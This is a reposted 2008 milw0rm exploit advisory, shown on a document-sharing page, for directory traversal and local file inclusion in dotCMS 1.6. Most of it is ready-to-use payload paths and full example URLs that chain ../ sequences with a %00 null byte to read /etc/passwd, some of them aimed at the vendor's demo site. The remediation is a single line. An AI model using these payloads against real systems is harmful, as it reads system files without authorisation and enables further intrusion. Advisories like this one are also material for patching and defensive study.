Do you have something the world needs to know about? Post your favorite news files in PDF, campaign contributions information from Excel, or handouts from your local politicians.

Global Documents

1 ++++++++++++++++++++++++++++++++++++++++++++++++++++++
2 + script:dotCMS
3 + home: http://www.dotcms.org
4 + demo: http://www.dotcms.org/the_dotcms/demos/demo.dot
5 + founder: Don of h4cky0u.org
6 + Vulnerability: Directory traversal
7 ++++++++++++++++++++++++++++++++++++++++++++++++++++++
8
9 exploit:
10 /index.dot?id=../../../../../../../../etc/passwd%00.jpg
11 /macros/macros_detail.dot?id=../../../../../../../../etc/passwd%00.html
12
13 example:
14 http://demo.dotcms.org/news/index.dot?id=../../../../../../../../etc/passwd%00.jpg
15 http://demo.dotcms.org/getting_started/macros/macros_detail.dot?id=../../../../../../../../etc/passwd%00.html
16
17 solution:
18 Script should filter meta characters from user input.
19 +++++++++++++++++++++++++++++++++++++++++++++++++++++++
20
21 # milw0rm.com [2008−08−15]
Page 1/1
dotCMS 1.6 id Multiple Local File Inclusion Vulnerabilities
Don
08/15/2008
